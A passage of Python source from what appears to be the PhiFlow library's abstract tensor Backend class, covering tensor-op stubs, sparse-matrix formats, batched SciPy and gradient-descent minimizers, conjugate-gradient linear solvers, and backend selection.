"""
Convolve value with kernel.
Depending on the tensor rank, the convolution is either 1D (rank=3), 2D (rank=4) or 3D (rank=5).
Higher dimensions may not be supported.
Args:
value: tensor of shape (batch_size, in_channel, spatial...)
kernel: tensor of shape (batch_size or 1, out_channel, in_channel, spatial...)
zero_padding: If True, pads the edges of `value` with zeros so that the result has the same shape as `value`.
Returns:
Convolution result as tensor of shape (batch_size, out_channel, spatial...)
"""
raise NotImplementedError(self)
def expand_dims(self, a, axis=0, number=1):
raise NotImplementedError(self)
def shape(self, tensor):
"""
Returns the shape of a tensor.
The shape is iterable and implements `len()`.
For non-eager tensors, undefined dimensions should return a placeholder value representing the size.
See Also:
`Backend.staticshape()`.
Args:
tensor: Native tensor compatible with this backend.
Returns:
Shape of `tensor`
"""
raise NotImplementedError(self)
def staticshape(self, tensor) -> tuple:
"""
Evaluates the static shape of a native tensor.
If the tensor is eager, the shape is a `tuple[int]`.
For placeholder tensors, unknown dimensions are represented as `None`.
See Also:
`Backend.shape()`.
Args:
tensor: Native tensor compatible with this backend.
Returns:
`tuple` of sizes. Each size is an `int` if the size is defined, else `None`.
"""
raise NotImplementedError(self)
def cast(self, x, dtype: DType):
raise NotImplementedError(self)
def to_float(self, x):
"""
Converts a tensor to floating point values with precision equal to the currently set default precision.
See Also:
`Backend.precision()`.
If `x` is mutable and of the correct floating type, returns a copy of `x`.
To convert float tensors to the backend precision but leave non-float tensors untouched, use `Backend.as_tensor()`.
Args:
x: tensor of bool, int or float
Returns:
Values of `x` as float tensor
"""
return self.cast(x, self.float_type)
def to_int32(self, x):
return self.cast(x, DType(int, 32))
def to_int64(self, x):
return self.cast(x, DType(int, 64))
def to_complex(self, x):
return self.cast(x, DType(complex, max(64, self.precision * 2)))
def batched_gather_nd(self, values, indices):
"""
Gathers values from the tensor `values` at locations `indices`.
The first dimension of `values` and `indices` is the batch dimension which must be either equal for both or one for either.
Args:
values: tensor of shape (batch, spatial..., channel)
indices: int tensor of shape (batch, any..., multi_index) where the size of multi_index is values.rank - 2.
Returns:
Gathered values as tensor of shape (batch, any..., channel)
"""
raise NotImplementedError(self)
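# Shape example (illustrative): values of shape (2, 32, 32, 3) gathered with int
# indices of shape (2, 100, 2) -- here multi_index has size values.rank - 2 == 2,
# i.e. a (y, x) pair -- produce a result of shape (2, 100, 3).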
def flatten(self, x):
return self.reshape(x, (-1,))
def std(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def boolean_mask(self, x, mask, axis=0):
"""
Args:
x: tensor with any number of dimensions
mask: 1D mask tensor
axis: Axis index >= 0
"""
raise NotImplementedError(self)
def isfinite(self, x):
raise NotImplementedError(self)
def scatter(self, base_grid, indices, values, mode: str):
"""
Depending on `mode`, performs scatter_update or scatter_add.
Args:
base_grid: Tensor into which scatter values are inserted at indices. Tensor of shape (batch_size, spatial..., channels)
indices: Tensor of shape (batch_size or 1, update_count, index_vector)
values: Values to scatter at indices. Tensor of shape (batch_size or 1, update_count or 1, channels or 1)
mode: One of ('update', 'add')
Returns:
Copy of base_grid with values at `indices` updated by `values`.
"""
raise NotImplementedError(self)
def any(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError(self)
def all(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError(self)
def quantile(self, x, quantiles):
"""
Reduces the last / inner axis of x.
Args:
x: Tensor
quantiles: List or 1D tensor of quantiles to compute.
Returns:
Tensor with shape (quantiles, *x.shape[:-1])
"""
raise NotImplementedError(self)
def fft(self, x, axes: tuple or list):
"""
Computes the n-dimensional FFT along the given axes.
Args:
x: tensor of dimension 3 or higher
axes: Along which axes to perform the FFT
Returns:
Complex tensor `k`
"""
raise NotImplementedError(self)
def ifft(self, k, axes: tuple or list):
"""
Computes the n-dimensional inverse FFT along the given axes.
Args:
k: tensor of dimension 3 or higher
axes: Along which axes to perform the inverse FFT
Returns:
Complex tensor `x`
"""
raise NotImplementedError(self)
def imag(self, x):
raise NotImplementedError(self)
def real(self, x):
raise NotImplementedError(self)
def conj(self, x):
raise NotImplementedError(self)
def sin(self, x):
raise NotImplementedError(self)
def arcsin(self, x):
raise NotImplementedError(self)
def cos(self, x):
raise NotImplementedError(self)
def arccos(self, x):
raise NotImplementedError(self)
def tan(self, x):
raise NotImplementedError(self)
def log(self, x):
""" Natural logarithm """
raise NotImplementedError(self)
def log2(self, x):
raise NotImplementedError(self)
def log10(self, x):
raise NotImplementedError(self)
def sigmoid(self, x):
return 1 / (1 + self.exp(-x))
def dtype(self, array) -> DType:
raise NotImplementedError(self)
def tile(self, value, multiples):
"""
Repeats the tensor along each axis the number of times given by multiples.
If `multiples` has more dimensions than `value`, these dimensions are added to `value` as outer dimensions.
Args:
value: tensor
multiples: tuple or list of integers
Returns:
tile tensor
"""
raise NotImplementedError(self)
def sparse_coo_tensor(self, indices: tuple or list, values, shape: tuple):
"""
Create a sparse matrix in coordinate list (COO) format.
Optional feature.
See Also:
`Backend.csr_matrix()`, `Backend.csc_matrix()`.
Args:
indices: 2D tensor of shape `(2, n)` or tuple/list of two 1D tensors `(rows, cols)`.
values: 1D values tensor matching `indices`
shape: Shape of the sparse matrix
Returns:
Native representation of the sparse matrix
"""
raise NotImplementedError(self)
def csr_matrix(self, column_indices, row_pointers, values, shape: tuple):
"""
Create a sparse matrix in compressed sparse row (CSR) format.
Optional feature.
See Also:
`Backend.sparse_coo_tensor()`, `Backend.csc_matrix()`.
Args:
column_indices: Column indices corresponding to `values`, 1D tensor
row_pointers: Indices in `values` where any row starts, 1D tensor of length `rows + 1`
values: Non-zero values, 1D tensor
shape: Shape of the full matrix
Returns:
Native representation of the sparse matrix
"""
raise NotImplementedError(self)
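# Worked CSR example (illustrative values): the dense matrix
#   [[5, 0, 0],
#    [0, 0, 7],
#    [0, 2, 0]]
# is encoded with values=[5, 7, 2], column_indices=[0, 2, 1] and
# row_pointers=[0, 1, 2, 3] (each row holds exactly one non-zero), for shape=(3, 3).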
def csc_matrix(self, column_pointers, row_indices, values, shape: tuple):
"""
Create a sparse matrix in compressed sparse column (CSC) format.
Optional feature.
See Also:
`Backend.sparse_coo_tensor()`, `Backend.csr_matrix()`.
Args:
column_pointers: Indices in `values` where any column starts, 1D tensor of length `cols + 1`
row_indices: Row indices corresponding to `values`.
values: Non-zero values, 1D tensor
shape: Shape of the full matrix
Returns:
Native representation of the sparse matrix
"""
raise NotImplementedError(self)
def coordinates(self, tensor):
"""
Returns the coordinates and values of a tensor.
Args:
tensor: Sparse tensor
Returns:
coordinates: `tuple` of tensors holding the coordinate vectors, i.e. (row, col) for matrices.
values: Tensor holding the corresponding values
"""
raise NotImplementedError(self)
def minimize(self, method: str, f, x0, atol, max_iter, trj: bool):
if method == 'GD':
return self._minimize_gradient_descent(f, x0, atol, max_iter, trj)
from scipy.optimize import OptimizeResult, minimize
from threading import Thread
assert self.supports(Backend.functional_gradient)
x0 = self.numpy(x0)
assert x0.ndim == 2 # (batch, parameters)
atol = self.numpy(atol)
max_iter = self.numpy(max_iter)
batch_size = x0.shape[0]
fg = self.functional_gradient(f, [0], get_output=True)
method_description = f"SciPy {method} with {self.name}"
iterations = [0] * batch_size
function_evaluations = [0] * batch_size
xs = [None] * batch_size
final_losses = [None] * batch_size
converged = [False] * batch_size
diverged = [False] * batch_size
messages = [""] * batch_size
f_inputs = [None] * batch_size
f_b_losses = None
f_b_losses_np = None
f_grad_np = None
f_input_available = Barrier(batch_size + 1)
f_output_available = Barrier(batch_size + 1)
finished = [False] * batch_size
all_finished = False
trajectories = [[] for _ in range(batch_size)] if trj else None
threads = []
for b in range(batch_size): # Run each independent example as a scipy minimization in a new thread
def b_thread(b=b):
recent_b_losses = []
def b_fun(x: numpy.ndarray):
function_evaluations[b] += 1
f_inputs[b] = self.as_tensor(x, convert_external=True)
f_input_available.wait()
f_output_available.wait()
recent_b_losses.append(f_b_losses[b])
if final_losses[b] is None: # first evaluation
final_losses[b] = f_b_losses[b]
if trajectories is not None:
trajectories[b].append(SolveResult(method_description, x0[b], f_b_losses[b], 0, 1, False, False, ""))
return f_b_losses_np[b], f_grad_np[b]
def callback(x, *args): # L-BFGS-B only passes x but the documentation says (x, state)
iterations[b] += 1
loss = min(recent_b_losses)
recent_b_losses.clear()
final_losses[b] = loss
if trajectories is not None:
trajectories[b].append(SolveResult(method_description, x, loss, iterations[b], function_evaluations[b], False, False, ""))
res = minimize(fun=b_fun, x0=x0[b], jac=True, method=method, tol=atol[b], options={'maxiter': max_iter[b]}, callback=callback)
assert isinstance(res, OptimizeResult)
# res.nit, res.nfev
xs[b] = res.x
converged[b] = res.success
diverged[b] = res.status not in (0, 1) # 0=success
messages[b] = res.message
finished[b] = True
while not all_finished:
f_input_available.wait()
f_output_available.wait()
b_thread = Thread(target=b_thread)
threads.append(b_thread)
b_thread.start()
while True:
f_input_available.wait()
if all(finished):
all_finished = True
f_output_available.wait()
break
_, f_b_losses, f_grad = fg(self.stack(f_inputs)) # Evaluate function and gradient
f_b_losses_np = self.numpy(f_b_losses).astype(numpy.float64)
f_grad_np = self.numpy(f_grad).astype(numpy.float64)
f_output_available.wait()
for b_thread in threads:
b_thread.join() # make sure threads exit correctly
if trj:
max_trajectory_length = max([len(t) for t in trajectories])
last_points = [SolveResult(method_description, xs[b], final_losses[b], iterations[b], function_evaluations[b], converged[b], diverged[b], "") for b in range(batch_size)]
trajectories = [t[:-1] + [last_point] * (max_trajectory_length - len(t) + 1) for t, last_point in zip(trajectories, last_points)]
trajectory = []
for states in zip(*trajectories):
x = self.stack([self.to_float(state.x) for state in states])
residual = self.stack([state.residual for state in states])
iterations = [state.iterations for state in states]
function_evaluations = [state.function_evaluations for state in states]
converged = [state.converged for state in states]
diverged = [state.diverged for state in states]
trajectory.append(SolveResult(method_description, x, residual, iterations, function_evaluations, converged, diverged, messages))
return trajectory
else:
x = self.stack(xs)
residual = self.stack(final_losses)
return SolveResult(method_description, x, residual, iterations, function_evaluations, converged, diverged, messages)
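# Illustrative only: the Barrier-based batching pattern above, reduced to a self-contained
# sketch (the names below are not part of this module). Each batch element runs its own
# scipy.optimize.minimize in a worker thread; the main thread evaluates the batched objective
# once per synchronization round and hands losses and gradients back to the workers.
#
#     import numpy as np
#     from threading import Barrier, Thread
#     from scipy.optimize import minimize
#
#     def batched_minimize(f_batched, x0, method='L-BFGS-B'):
#         """f_batched maps (batch, n) -> (losses of shape (batch,), grads of shape (batch, n))."""
#         batch_size, n = x0.shape
#         inputs = [None] * batch_size
#         losses = grads = None
#         results = [None] * batch_size
#         finished = [False] * batch_size
#         done = [False]                       # set by the main thread only (avoids a shutdown race)
#         in_ready = Barrier(batch_size + 1)   # all workers have posted their query points
#         out_ready = Barrier(batch_size + 1)  # main thread has posted losses and gradients
#
#         def worker(b):
#             def fun(x):
#                 inputs[b] = x
#                 in_ready.wait()
#                 out_ready.wait()
#                 return losses[b], grads[b]
#             results[b] = minimize(fun, x0[b], jac=True, method=method)
#             finished[b] = True
#             while not done[0]:               # keep joining the barriers until everyone is done
#                 in_ready.wait()
#                 out_ready.wait()
#
#         threads = [Thread(target=worker, args=(b,)) for b in range(batch_size)]
#         for t in threads:
#             t.start()
#         while True:
#             in_ready.wait()
#             if all(finished):
#                 done[0] = True
#                 out_ready.wait()
#                 break
#             losses, grads = f_batched(np.stack(inputs))
#             out_ready.wait()
#         for t in threads:
#             t.join()
#         return results
#
#     def quadratic(x):                        # minimize ||x - target||^2 per batch element
#         target = np.arange(x.shape[1], dtype=float)
#         diff = x - target
#         return np.sum(diff ** 2, axis=1), 2 * diff
#
#     print([r.x for r in batched_minimize(quadratic, np.zeros((3, 4)))])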
def _minimize_gradient_descent(self, f, x0, atol, max_iter, trj: bool, step_size='adaptive'):
assert self.supports(Backend.functional_gradient)
assert len(self.staticshape(x0)) == 2 # (batch, parameters)
batch_size = self.staticshape(x0)[0]
fg = self.functional_gradient(f, [0], get_output=True)
method = f"Gradient descent with {self.name}"
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
adaptive_step_size = step_size == 'adaptive'
if adaptive_step_size:
step_size = self.zeros([batch_size]) + 0.1
_, loss, grad = fg(x0) # Evaluate function and gradient
diverged = self.any(~self.isfinite(x0), axis=(1,))
converged = self.zeros([batch_size], DType(bool))
trajectory = [SolveResult(method, x0, loss, iterations, function_evaluations, converged, diverged, [""] * batch_size)] if trj else None
continue_ = ~converged & ~diverged & (iterations < max_iter)
def gd_step(continue_, x, loss, grad, iterations, function_evaluations, step_size, converged, diverged):
prev_loss, prev_grad, prev_x = loss, grad, x
continue_1 = self.to_int32(continue_)
iterations += continue_1
if adaptive_step_size:
for i in range(20):
dx = - grad * self.expand_dims(step_size * self.to_float(continue_1), -1)
next_x = x + dx
predicted_loss_decrease = - self.sum(grad * dx, -1) # >= 0
_, next_loss, next_grad = fg(next_x); function_evaluations += continue_1
converged = converged | (self.sum(next_grad ** 2, axis=-1) < atol ** 2)
PHI_LOGGER.debug(f"Gradient: {self.numpy(next_grad)} with step_size={self.numpy(step_size)}")
actual_loss_decrease = loss - next_loss # we want > 0
# we want actual_loss_decrease to be at least half of predicted_loss_decrease
act_pred = self.divide_no_nan(actual_loss_decrease, predicted_loss_decrease)
PHI_LOGGER.debug(f"Actual/Predicted: {self.numpy(act_pred)}")
step_size_fac = self.clip(self.log(1 + 1.71828182845 * self.exp((act_pred - 0.5) * 2.)), 0.1, 10)
PHI_LOGGER.debug(f"step_size *= {self.numpy(step_size_fac)}")
step_size *= step_size_fac
if self.all((act_pred > 0.4) & (act_pred < 0.9) | converged | diverged):
PHI_LOGGER.debug(f"GD minimization: Finished step_size adjustment after {i + 1} tries\n")
break
else:
converged = converged | (abs(actual_loss_decrease) < predicted_loss_decrease)
PHI_LOGGER.debug("Backend._minimize_gradient_descent(): No step size found!\n")
diverged = diverged | (next_loss > loss)
x, loss, grad = next_x, next_loss, next_grad
else:
x -= grad * self.expand_dims(step_size * self.to_float(continue_1), -1)
_, loss, grad = fg(x); function_evaluations += continue_1
diverged = self.any(~self.isfinite(x), axis=(1,)) | (loss > prev_loss)
converged = ~diverged & (prev_loss - loss < atol)
if trj:
                trajectory.append(SolveResult(method, self.numpy(x), self.numpy(loss), self.numpy(iterations), self.numpy(function_evaluations), self.numpy(converged), self.numpy(diverged), [""] * batch_size))  # converged/diverged order now matches every other SolveResult call
continue_ = ~converged & ~diverged & (iterations < max_iter)
return continue_, x, loss, grad, iterations, function_evaluations, step_size, converged, diverged
not_converged, x, loss, grad, iterations, function_evaluations, step_size, converged, diverged = self.while_loop(gd_step, (continue_, x0, loss, grad, iterations, function_evaluations, step_size, converged, diverged))
if trj:
trajectory.append(SolveResult(method, x, loss, iterations, function_evaluations + 1, converged, diverged, [""] * batch_size))
return trajectory
else:
return SolveResult(method, x, loss, iterations, function_evaluations, converged, diverged, [""] * batch_size)
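# Illustrative only: the adaptive step-size multiplier used in gd_step above, as a standalone
# function. `act_pred` is the ratio of actual to predicted loss decrease; the constant
# 1.71828... above is e - 1, so the factor is exactly 1 at a ratio of 0.5, shrinks the step
# (down to 0.1x) for poor or negative ratios, and grows it (up to 10x) for good ones.
#
#     import numpy as np
#
#     def step_size_factor(act_pred):
#         return np.clip(np.log(1 + (np.e - 1) * np.exp((act_pred - 0.5) * 2.0)), 0.1, 10)
#
#     print(step_size_factor(np.array([-0.5, 0.0, 0.5, 1.0, 2.0])))  # ≈ [0.21, 0.49, 1.0, 1.74, 3.57]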
def linear_solve(self, method: str, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
"""
Solve the system of linear equations A · x = y.
This method need not provide a gradient for the operation.
Args:
method: Which algorithm to use. One of `('auto', 'CG', 'CG-adaptive')`.
lin: Linear operation. One of
* sparse/dense matrix valid for all instances
* tuple/list of sparse/dense matrices for varying matrices along batch, must have the same nonzero locations.
* linear function A(x), must be called on all instances in parallel
y: target result of A * x. 2nd order tensor (batch, vector) or list of vectors.
x0: Initial guess of size (batch, parameters)
rtol: Relative tolerance of size (batch,)
atol: Absolute tolerance of size (batch,)
max_iter: Maximum number of iterations of size (batch,)
trj: Whether to record and return the optimization trajectory as a `List[SolveResult]`.
Returns:
result: `SolveResult` or `List[SolveResult]`, depending on `trj`.
"""
if method == 'auto':
return self.conjugate_gradient_adaptive(lin, y, x0, rtol, atol, max_iter, trj)
elif method == 'CG':
return self.conjugate_gradient(lin, y, x0, rtol, atol, max_iter, trj)
elif method == 'CG-adaptive':
return self.conjugate_gradient_adaptive(lin, y, x0, rtol, atol, max_iter, trj)
else:
raise NotImplementedError(f"Method '{method}' not supported for linear solve.")
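# Usage sketch (illustrative; assumes a registered backend whose tensor methods cover the calls
# used by the CG loops below, e.g. a NumPy-based backend). Shapes follow the docstring: y and x0
# are (batch, parameters); rtol, atol and max_iter have shape (batch,).
#
#     import numpy as np
#     A = np.array([[4., 1.], [1., 3.]])
#     lin = lambda x: x @ A.T                      # linear-function form, applied to all batch rows
#     y = np.array([[1., 2.]])
#     x0 = np.zeros((1, 2))
#     b = choose_backend(y, x0)                    # see further below
#     result = b.linear_solve('CG', lin, y, x0, rtol=np.array([1e-5]), atol=np.array([1e-5]),
#                             max_iter=np.array([100]), trj=False)
#     print(result.x, result.converged)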
def conjugate_gradient(self, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
""" Standard conjugate gradient algorithm. Signature matches to `Backend.linear_solve()`. """
# Based on "An Introduction to the Conjugate Gradient Method Without the Agonizing Pain" by Jonathan Richard Shewchuk
# symbols: dx=d, dy=q, step_size=alpha, residual_squared=delta, residual=r, y=b
method = f"Φ-Flow CG ({self.name})"
y = self.to_float(y)
x0 = self.copy(self.to_float(x0), only_mutable=True)
batch_size = self.staticshape(y)[0]
tolerance_sq = self.maximum(rtol ** 2 * self.sum(y ** 2, -1), atol ** 2)
x = x0
dx = residual = y - self.linear(lin, x)
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
residual_squared = rsq0 = self.sum(residual ** 2, -1, keepdims=True)
diverged = self.any(~self.isfinite(x), axis=(1,))
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
trajectory = [SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")] if trj else None
continue_ = ~converged & ~diverged & (iterations < max_iter)
def cg_loop_body(continue_, it_counter, x, dx, residual_squared, residual, iterations, function_evaluations, _converged, _diverged):
continue_1 = self.to_int32(continue_)
it_counter += 1; iterations += continue_1
with spatial_derivative_evaluation(1):
dy = self.linear(lin, dx); function_evaluations += continue_1
dx_dy = self.sum(dx * dy, axis=-1, keepdims=True)
step_size = self.divide_no_nan(residual_squared, dx_dy)
step_size *= self.expand_dims(self.to_float(continue_1), -1) # this is not really necessary but ensures batch-independence
x += step_size * dx
# if it_counter % 50 == 0:
# residual = y - self.linear(lin, x); function_evaluations += 1
# else:
residual = residual - step_size * dy # in-place subtraction affects convergence
residual_squared_old = residual_squared
residual_squared = self.sum(residual ** 2, -1, keepdims=True)
dx = residual + self.divide_no_nan(residual_squared, residual_squared_old) * dx
diverged = self.any(residual_squared / rsq0 > 100, axis=(1,)) & (iterations >= 8)
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
if trajectory is not None:
trajectory.append(SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, ""))
x = self.copy(x)
iterations = self.copy(iterations)
continue_ = ~converged & ~diverged & (iterations < max_iter)
return continue_, it_counter, x, dx, residual_squared, residual, iterations, function_evaluations, converged, diverged
_, _, x, _, _, residual, iterations, function_evaluations, converged, diverged = self.while_loop(cg_loop_body, (continue_, 0, x, dx, residual_squared, residual, iterations, function_evaluations, converged, diverged))
return trajectory if trj else SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")
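# Illustrative only: the same recurrence as cg_loop_body above, in plain NumPy for a single
# right-hand side, without batching, tracing or divergence bookkeeping.
#
#     import numpy as np
#
#     def cg_reference(A, y, x0, rtol=1e-5, atol=1e-5, max_iter=1000):
#         x = x0.astype(float).copy()
#         residual = y - A @ x
#         dx = residual.copy()
#         residual_squared = residual @ residual
#         tolerance_sq = max(rtol ** 2 * (y @ y), atol ** 2)
#         for _ in range(max_iter):
#             if residual_squared <= tolerance_sq:
#                 break
#             dy = A @ dx
#             step_size = residual_squared / (dx @ dy)
#             x = x + step_size * dx
#             residual = residual - step_size * dy          # incremental residual update, as above
#             residual_squared, residual_squared_old = residual @ residual, residual_squared
#             dx = residual + (residual_squared / residual_squared_old) * dx
#         return x
#
#     A = np.array([[4., 1.], [1., 3.]])
#     print(cg_reference(A, np.array([1., 2.]), np.zeros(2)))  # ≈ [0.0909, 0.6364]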
def conjugate_gradient_adaptive(self, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
""" Conjugate gradient algorithm with adaptive step size. Signature matches to `Backend.linear_solve()`. """
# Based on the variant described in "Methods of Conjugate Gradients for Solving Linear Systems" by Magnus R. Hestenes and Eduard Stiefel
# https://nvlpubs.nist.gov/nistpubs/jres/049/jresv49n6p409_A1b.pdf
method = f"Φ-Flow CG-adaptive ({self.name})"
y = self.to_float(y)
x0 = self.copy(self.to_float(x0), only_mutable=True)
batch_size = self.staticshape(y)[0]
tolerance_sq = self.maximum(rtol ** 2 * self.sum(y ** 2, -1), atol ** 2)
x = x0
dx = residual = y - self.linear(lin, x)
dy = self.linear(lin, dx)
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
residual_squared = rsq0 = self.sum(residual ** 2, -1, keepdims=True)
diverged = self.any(~self.isfinite(x), axis=(1,))
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
trajectory = [SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")] if trj else None
continue_ = ~converged & ~diverged & (iterations < max_iter)
def acg_loop_body(continue_, it_counter, x, dx, dy, residual, iterations, function_evaluations, _converged, _diverged):
continue_1 = self.to_int32(continue_)
it_counter += 1
iterations += continue_1
dx_dy = self.sum(dx * dy, axis=-1, keepdims=True)
step_size = self.divide_no_nan(self.sum(dx * residual, axis=-1, keepdims=True), dx_dy)
step_size *= self.expand_dims(self.to_float(continue_1), -1) # this is not really necessary but ensures batch-independence
x += step_size * dx
# if it_counter % 50 == 0: # Not traceable since Python bool
# residual = y - self.linear(lin, x); function_evaluations += 1
# else:
residual = residual - step_size * dy # in-place subtraction affects convergence
residual_squared = self.sum(residual ** 2, -1, keepdims=True)
dx = residual - self.divide_no_nan(self.sum(residual * dy, axis=-1, keepdims=True) * dx, dx_dy)
with spatial_derivative_evaluation(1):
dy = self.linear(lin, dx); function_evaluations += continue_1
diverged = self.any(residual_squared / rsq0 > 100, axis=(1,)) & (iterations >= 8)
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
if trajectory is not None:
trajectory.append(SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, ""))
x = self.copy(x)
iterations = self.copy(iterations)
continue_ = ~converged & ~diverged & (iterations < max_iter)
return continue_, it_counter, x, dx, dy, residual, iterations, function_evaluations, converged, diverged
_, _, x, _, _, residual, iterations, function_evaluations, converged, diverged = self.while_loop(acg_loop_body, (continue_, 0, x, dx, dy, residual, iterations, function_evaluations, converged, diverged))
return trajectory if trj else SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")
def linear(self, lin, vector):
if callable(lin):
return lin(vector)
elif isinstance(lin, (tuple, list)):
for lin_i in lin:
lin_shape = self.staticshape(lin_i)
assert len(lin_shape) == 2
return self.stack([self.matmul(m, v) for m, v in zip(lin, self.unstack(vector))])
else:
lin_shape = self.staticshape(lin)
assert len(lin_shape) == 2, f"A must be a matrix but got shape {lin_shape}"
return self.matmul(lin, vector)
def gradients(self, y, xs: tuple or list, grad_y) -> tuple:
raise NotImplementedError(self)
def record_gradients(self, xs: tuple or list, persistent=False):
raise NotImplementedError(self)
def stop_gradient(self, value):
raise NotImplementedError(self)
def grid_sample(self, grid, coordinates, extrapolation: str):
"""
Interpolates a regular grid at the specified coordinates.
Args:
grid: Tensor of shape (batch, spatial..., channel)
coordinates: Tensor of floating grid indices of shape (batch, instance..., vector).
                The last dimension must match the number of spatial dimensions of `grid`.
                The first grid point of each spatial dimension lies at position 0, the last at position `size - 1`, where `size` is the extent of that dimension.
extrapolation: Values to use for coordinates outside the grid.
One of `('undefined', 'zeros', 'boundary', 'periodic', 'symmetric', 'reflect')`.
Returns:
sampled values with linear interpolation
"""
return NotImplemented
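# Not part of the Backend API: a minimal NumPy sketch of the documented contract for a single
# spatial dimension with 'boundary' (clamp) extrapolation, illustrating the convention that
# grid point i lies at coordinate i.
#
#     import numpy as np
#
#     def grid_sample_1d_boundary(grid, coordinates):
#         """grid: (batch, x, channel); coordinates: (batch, instance, 1) float grid indices."""
#         batch, size, _ = grid.shape
#         coords = np.clip(coordinates[..., 0], 0, size - 1)   # 'boundary' extrapolation
#         lo = np.floor(coords).astype(int)
#         hi = np.minimum(lo + 1, size - 1)
#         w = (coords - lo)[..., None]                         # linear interpolation weight
#         b = np.arange(batch)[:, None]
#         return (1 - w) * grid[b, lo] + w * grid[b, hi]
#
#     grid = np.linspace(0., 3., 4).reshape(1, 4, 1)           # values 0..3 at positions 0..3
#     print(grid_sample_1d_boundary(grid, np.array([[[0.5], [3.7]]])))  # -> [[[0.5], [3.0]]]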
def variable(self, value):
return NotImplemented
def ndims(self, tensor):
return len(self.staticshape(tensor))
def size(self, array):
return self.prod(self.shape(array))
def multi_slice(self, tensor, slices: tuple):
return tensor[slices]
def batch_gather(self, tensor, batches):
if isinstance(batches, int):
batches = [batches]
return tensor[batches, ...]
def unstack(self, tensor, axis=0, keepdims=False) -> tuple:
if axis < 0:
axis += len(tensor.shape)
if axis >= len(tensor.shape) or axis < 0:
raise ValueError("Illegal axis value")
result = []
for slice_idx in range(tensor.shape[axis]):
if keepdims:
component = tensor[tuple([slice(slice_idx, slice_idx + 1) if d == axis else slice(None) for d in range(len(tensor.shape))])]
else:
component = tensor[tuple([slice_idx if d == axis else slice(None) for d in range(len(tensor.shape))])]
result.append(component)
return tuple(result)
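# Illustrative only: the keepdims distinction above, shown with the equivalent NumPy slicing
# for axis=0 of a (2, 3) array.
#
#     import numpy as np
#     t = np.arange(6).reshape(2, 3)
#     print(t[0].shape)    # (3,)    -- what each unstacked component looks like with keepdims=False
#     print(t[0:1].shape)  # (1, 3)  -- what each unstacked component looks like with keepdims=True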
def equal(self, x, y):
""" Element-wise equality check """
raise NotImplementedError(self)
def not_equal(self, x, y):
return ~self.equal(x, y)
def greater_than(self, x, y):
x, y = self.auto_cast(x, y)
return x > y
def greater_or_equal(self, x, y):
x, y = self.auto_cast(x, y)
return x >= y
def add(self, a, b):
a, b = self.auto_cast(a, b)
return a + b
def sub(self, a, b):
a, b = self.auto_cast(a, b)
return a - b
def mul(self, a, b):
a, b = self.auto_cast(a, b)
return a * b
def div(self, numerator, denominator):
numerator, denominator = self.auto_cast(numerator, denominator)
return numerator / denominator
def pow(self, base, exp):
base, exp = self.auto_cast(base, exp)
return base ** exp
def mod(self, dividend, divisor):
dividend, divisor = self.auto_cast(dividend, divisor)
return dividend % divisor
def and_(self, a, b):
a, b = self.auto_cast(a, b)
return a & b
def or_(self, a, b):
a, b = self.auto_cast(a, b)
return a | b
def xor(self, a, b):
a, b = self.auto_cast(a, b)
return a ^ b
def floordiv(self, a, b):
a, b = self.auto_cast(a, b)
return a // b
BACKENDS = []
""" Global list of all registered backends. Register a `Backend` by adding it to the list. """
_DEFAULT = [] # [0] = global default, [1:] from 'with' blocks
_PRECISION = [32] # [0] = global precision in bits, [1:] from 'with' blocks
def choose_backend(*values, prefer_default=False) -> Backend:
"""
Selects a suitable backend to handle the given values.
This function is used by most math functions operating on `Tensor` objects to delegate the actual computations.
Backends need to be registered to be available, e.g. via the global import `phi.<backend>` or `phi.detect_backends()`.
Args:
*values:
prefer_default: Whether to always select the default backend if it can work with `values`, see `default_backend()`.
Returns:
The selected `Backend`
"""
# --- Default Backend has priority ---
if _is_applicable(_DEFAULT[-1], values) and (prefer_default or _is_specific(_DEFAULT[-1], values)):
return _DEFAULT[-1]
# --- Filter out non-applicable ---
backends = [backend for backend in BACKENDS if _is_applicable(backend, values)]
if len(backends) == 0:
raise NoBackendFound(f"No backend found for types {[type(v).__name__ for v in values]}; registered backends are {BACKENDS}")
# --- Native tensors? ---
for backend in backends:
if _is_specific(backend, values):
return backend
return backends[0]
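# Usage sketch (illustrative; requires that at least one backend able to handle NumPy arrays has
# been registered, e.g. via the imports mentioned in the docstring above):
#
#     import numpy as np
#     b = choose_backend(np.zeros((2, 3)))
#     print(b.name, b.staticshape(np.zeros((2, 3))))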
class NoBackendFound(Exception):
"""
Thrown by `choose_backend` if no backend can handle the given values.
"""
def __init__(self, msg):
Exception.__init__(self, msg)
def default_backend() -> Backend:
"""
The default backend is preferred by `choose_backend()`.
The default backend can be set globally using `set_global_default_backend()` and locally using `with backend:`.
Returns:
current default `Backend`
"""
return _DEFAULT[-1]
def context_backend() -> Backend or None:
"""
Returns the backend set by the inner-most surrounding `with backend:` block.
If called outside a backend context, returns `None`.
Returns:
`Backend` or `None`
"""
return _DEFAULT[-1] if len(_DEFAULT) > 1 else None
def set_global_default_backend(backend: Backend):
"""
Sets the given backend as default.
This setting can be overridden using `with backend:`.
See `default_backend()`, `choose_backend()`.
Args:
backend: `Backend` to set as default
"""
assert isinstance(backend, Backend)
_DEFAULT[0] = backend
def set_global_precision(floating_point_bits: int):
"""
Sets the floating point precision of DYNAMIC_BACKEND which affects all registered backends.
If `floating_point_bits` is an integer, all floating point tensors created henceforth will be of the corresponding data type, float16, float32 or float64.
